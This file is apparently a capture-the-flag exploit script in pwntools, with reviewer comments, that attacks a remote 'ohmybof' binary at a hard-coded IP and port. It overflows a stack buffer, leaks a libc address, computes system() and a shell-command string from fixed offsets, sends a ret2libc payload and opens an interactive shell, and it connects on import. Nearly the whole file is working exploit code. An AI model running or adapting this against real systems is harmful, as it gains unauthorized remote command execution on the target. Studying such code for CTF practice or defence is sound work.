from pwn import *
from hexdump import *
#p = process("./ohmybof")
# NOTE(review): the connection is opened at module import time, not inside
# main(); importing this file reaches out to the hard-coded host:port below.
# The local process() variant is left commented out above.
p = remote("223.194.105.182", 41001)
def main():
    """Drive a two-stage exchange with the already-connected ``p``.

    Stage 1 sends 24 bytes of padding followed by the 4-byte value ``wr``,
    then reads 4 bytes back and treats them as a leaked address.  Stage 2
    derives ``base``, ``system`` and ``cmd`` from that leak with hard-coded
    offsets and sends a second 24-byte-padded payload.  Every address and
    offset is a constant for one specific binary/libc build; nothing is
    validated at runtime, so a mismatched build silently produces garbage.
    """
    popret = 0x80482ad  # unused in this script
    wr = 0x080483E3
    # NOTE(review): Python 2-era pwntools idiom (str payloads mixed with
    # p32() output); not portable to Python 3 as written.
    payload = "A" * 24
    payload += p32(wr)
    p.recvuntil("attack: " + "\x00")
    p.send(payload)
    # The first 4 bytes of the reply are taken as the leak with no length
    # or sanity check; a short read raises inside u32().
    leak = u32(p.recv(4))
    log.info("leak: " + hex(leak))
    base = leak - 0x18637  # libc-build-specific offset, hard-coded
    log.info("libc base: " + hex(base))
    system = base + 0x3ada0  # libc-build-specific offset, hard-coded
    cmd = base + 0x15b82b  # libc-build-specific offset, hard-coded
    p.recv(1024)  # remainder of the reply is read and discarded
    data = 0x0804A010  # unused in this script
    pop3ret = 0x8048489  # unused in this script
    payload = "\x00" * 24
    payload += p32(system)
    payload += "AAAA"
    payload += p32(cmd)
    p.send(payload)
    p.interactive()
# Entry-point guard.  Note that it only gates main(); the remote() call at
# module level has already connected by the time this line runs.
if __name__=='__main__':
    main()